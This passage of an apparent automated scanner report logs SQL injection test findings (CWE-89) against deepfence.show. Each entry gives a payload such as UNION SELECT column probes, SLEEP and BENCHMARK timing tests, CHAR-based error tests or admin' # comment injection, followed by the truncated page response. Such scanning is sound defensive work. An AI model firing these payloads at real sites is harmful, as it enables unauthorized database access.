href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #551\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of\nZendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> <\n/script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link\nrel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWF\nnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoq\nIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints \non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #552\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1*56\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #553\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\"&\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #554\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #555\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #556\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #557\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io UNION ALL SELECT 1,2,3,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #558\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #559\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #560\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io&&SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #561\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #562Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io@@variable\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #563\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL \nSELECTCHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #564\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 